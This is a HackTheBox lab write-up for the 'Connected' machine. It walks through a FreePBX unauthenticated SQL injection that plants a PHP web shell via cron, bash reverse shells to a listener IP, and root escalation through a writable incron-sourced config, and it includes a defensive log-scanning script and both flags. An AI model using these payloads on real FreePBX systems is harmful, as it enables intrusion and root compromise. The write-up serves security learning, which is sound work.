HackTheBox Writeup - Connected
Introduction
Connected is a Season 11 Linux machine on HackTheBox that features a FreePBX installation. The exploitation path involves an unauthenticated SQL injection in the Endpoint Manager module, leading to Remote Code Execution (RCE) via system cron jobs. Privilege escalation is achieved by exploiting a misconfigured Incron service that sources a writable configuration file.
Enumeration
Nmap Scan
Starting with a standard Nmap scan to identify open ports:
```bash
nmap -sC -sV -oN nmap_initial.txt 10.129.2.106
```
Output:
```text
PORT    STATE SERVICE   VERSION
22/tcp  open  ssh       OpenSSH 7.4 (protocol 2.0)
80/tcp  open  http      Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16)
443/tcp open  ssl/https Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.16
```
The web server hosts FreePBX 16.0.40.7.
Foothold
Unauthenticated SQL Injection (CVE-2025-57819)
Researching the FreePBX version reveals a critical unauthenticated SQL injection in the Endpoint Manager component. The vulnerable endpoint is /admin/ajax.php where the brand parameter is susceptible to stacked-query injection.
We can use this to insert a malicious job into the cron_jobs table. FreePBX periodically executes commands from this table as the asterisk user.
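As an added defensive example (my code, not from the writeup or the FreePBX project), the following Python flags access-log requests to the Endpoint Manager ajax.php endpoint whose brand parameter carries stacked-query SQL, a cron_jobs reference, or a file-drop command. The log lines are constructed to mirror the request shape described here, and the Apache combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed Apache access-log lines for illustration (not traffic captured from the box).
# Line 1 mirrors the shape of the stacked-query request; lines 2 and 3 are benign GUI calls.
SAMPLE_LOG = r"""
10.10.14.203 - - [01/Jan/2025:12:00:00 +0000] "GET /admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x%27%3B+INSERT+INTO+cron_jobs+%28modulename%2Cjobname%2Ccommand%29+VALUES+%28%27sysadmin%27%2C%27wt-shell3%27%2C%27echo+x%7Cbase64+-d+%3E%2Fvar%2Fwww%2Fhtml%2Fwt-shell3.php%27%29--+- HTTP/1.1" 200 512 "-" "curl/8.0"
10.10.14.5 - - [01/Jan/2025:12:01:00 +0000] "GET /admin/ajax.php?module=endpoint&command=model&brand=yealink HTTP/1.1" 200 128 "-" "Mozilla/5.0"
10.10.14.5 - - [01/Jan/2025:12:02:00 +0000] "GET /admin/config.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Apache combined-format request line: client, timestamp, method, target, status (assumed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')
# A quote followed by a statement terminator, or a bare SQL verb, has no place in a brand name.
STACKED_SQL = re.compile(r"'\s*;|\b(?:insert|update|delete|union|select)\s", re.IGNORECASE)

def query_params(query):
    """Split a query string on '&' only (parsers that also split on ';' would hide the payload)."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params

def inspect_line(line):
    """Return a finding for an Endpoint Manager ajax.php request with a hostile brand value, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/admin/ajax.php"):
        return None
    params = query_params(url.query)
    if "endpoint" not in " ".join(params.get("module", [])).lower():
        return None
    brand = " ".join(params.get("brand", []))
    reasons = []
    if STACKED_SQL.search(brand):
        reasons.append("sql-metacharacters-in-brand")
    if "cron_jobs" in brand.lower():
        reasons.append("cron_jobs-reference")
    if re.search(r"base64\s+-d|/var/www/html", brand):
        reasons.append("file-drop-command")
    if not reasons:
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "brand": brand, "reasons": reasons}

def scan_log(text):
    """Run inspect_line over every line of an access log and collect the findings."""
    return [hit for hit in (inspect_line(line) for line in text.splitlines()) if hit]
```

Feeding the real access log through scan_log gives the source IP and timestamp of each injection attempt, which is the pivot point for checking the cron_jobs table for rows that do not belong.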
Payload Delivery
The following payload inserts a job that decodes a base64 string into a PHP web shell at /var/www/html/wt-shell3.php:
```bash
curl -ik -G --data-urlencode "brand=x'; INSERT INTO cron_jobs (modulename,jobname,command,class,schedule,max_runtime,enabled,execution_order) VALUES ('sysadmin','wt-shell3','echo \"PD9waHAgc3lzdGVtKCRfUkVRVUVTVFsnY21kJ10pOyA/Pg==\"|base64 -d >/var/www/html/wt-shell3.php',NULL,'* * * * *',30,1,1)-- -" "http://connected.htb/admin/ajax.php?module=FreePBX\modules\endpoint\ajax&command=model&template=x&model=model"
```
After waiting about a minute for the cron job to trigger, we can verify the web shell:
```bash
curl -ik "http://connected.htb/wt-shell3.php?cmd=id"
# uid=999(asterisk) gid=1000(asterisk) groups=1000(asterisk)
```
Reverse Shell
Establish a reverse shell by sending a bash redirection payload:
```bash
curl -ik -G --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.203/80 0>&1'" "http://connected.htb/wt-shell3.php"
```
User Flag: 6824db9c13d3e88cef5dd67a7f709021
Privilege Escalation
Incron and Sourcing Vulnerability
Enumerating the system reveals that /etc/dahdi/init.conf is writable by the asterisk user:
```bash
ls -la /etc/dahdi/init.conf
# -rw-r--r--. 1 asterisk asterisk 771 Jun 5 2023 /etc/dahdi/init.conf
```
Further investigation into Incron configs shows that a root-owned script /usr/sbin/sysadmin_dahdi_restart is executed whenever the file /var/spool/asterisk/sysadmin/dahdi_restart is modified.
The root script sources the writable /etc/dahdi/init.conf file, which allows us to execute arbitrary commands as root.
Exploitation
- Inject Payload: Append a reverse shell command to the configuration file.
```bash
echo 'bash -c "bash -i >& /dev/tcp/10.10.14.203/4445 0>&1" &' >> /etc/dahdi/init.conf
```
- Trigger Execution: Write to the monitored file to trigger the Incron event.
```bash
echo 'restart' > /var/spool/asterisk/sysadmin/dahdi_restart
```
Catch the incoming connection on our listener:
```bash
nc -lvnp 4445
# [root@connected /]# id
# uid=0(root) gid=0(root) groups=0(root)
```
Root Flag: 958931a893953bc371afc148ec633a60
Conclusion
This machine demonstrates the risk of unauthenticated administrative endpoints and the importance of secure file permissions. Always ensure that configuration files sourced by high-privilege scripts are not writable by lower-privileged users.